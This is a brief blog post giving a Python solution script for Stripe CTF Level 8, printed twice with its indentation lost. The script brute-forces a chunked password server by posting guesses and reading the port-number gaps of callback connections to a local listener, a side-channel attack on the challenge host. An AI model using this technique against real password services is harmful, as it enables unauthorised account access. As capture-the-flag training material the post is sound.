Quick solution post before leaving for vacation for Stripe’s CTF Level 8.
#!/usr/bin/env python
# aXs - http://codezen.fr
#
# Stripe CTF Level 8
import time
import requests
import socket
import threading
import SocketServer
import Queue
import json
import random
import sys
remote_port = 0
q = Queue.Queue(maxsize=0)
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
global remote_port
data = self.request.recv(1024)
client_ip, client_port = self.client_address
#print client_ip, client_port
delta = client_port - remote_port
remote_port = client_port
self.request.close()
q.put(delta)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
# Port 0 means to select an arbitrary unused port
HOST, PORT = "0.0.0.0", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print "Server loop running in thread:", server_thread.name
endpoint = "https://level08-3.stripe-ctf.com/user-oxtxhpbwuz/"
numbers = range(0,1000)
random.shuffle(numbers)
#numbers = ['641', '243', '093', '589', '728']
candidate = []
chunk = 1 # increment after each found chunk
found = "" # add found chunk here
level2_ip = "10.0.2.134"
while len(numbers):
i = int(numbers.pop())
print "Moving to " + str(i)
guess = str(i).zfill(3)
body = '{"password": "' + found + str(guess) + 'A'*((4-chunk)*3) + '", "webhooks": ["' + level2_ip + ':'+str(port)+'"]}'
delta = 0
while delta>(chunk+2) or delta<1:
resp = requests.post(endpoint, data=body)
delta = q.get()
result = json.loads(resp.text)
print resp.text, result
if result['success'] == True: # true for last chunk only
print "WIIIIIIIIN"
sys.exit()
if delta == (chunk+2):
print "CANDIDATE=", guess, resp.text
candidate.append(guess)
print guess + "|" + str(delta)
print repr(candidate)
server.shutdown()
# aXs - http://codezen.fr
#
# Stripe CTF Level 8
import time
import requests
import socket
import threading
import SocketServer
import Queue
import json
import random
import sys
remote_port = 0
q = Queue.Queue(maxsize=0)
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
global remote_port
data = self.request.recv(1024)
client_ip, client_port = self.client_address
#print client_ip, client_port
delta = client_port - remote_port
remote_port = client_port
self.request.close()
q.put(delta)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
# Port 0 means to select an arbitrary unused port
HOST, PORT = "0.0.0.0", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print "Server loop running in thread:", server_thread.name
endpoint = "https://level08-3.stripe-ctf.com/user-oxtxhpbwuz/"
numbers = range(0,1000)
random.shuffle(numbers)
#numbers = ['641', '243', '093', '589', '728']
candidate = []
chunk = 1 # increment after each found chunk
found = "" # add found chunk here
level2_ip = "10.0.2.134"
while len(numbers):
i = int(numbers.pop())
print "Moving to " + str(i)
guess = str(i).zfill(3)
body = '{"password": "' + found + str(guess) + 'A'*((4-chunk)*3) + '", "webhooks": ["' + level2_ip + ':'+str(port)+'"]}'
delta = 0
while delta>(chunk+2) or delta<1:
resp = requests.post(endpoint, data=body)
delta = q.get()
result = json.loads(resp.text)
print resp.text, result
if result['success'] == True: # true for last chunk only
print "WIIIIIIIIN"
sys.exit()
if delta == (chunk+2):
print "CANDIDATE=", guess, resp.text
candidate.append(guess)
print guess + "|" + str(delta)
print repr(candidate)
server.shutdown()
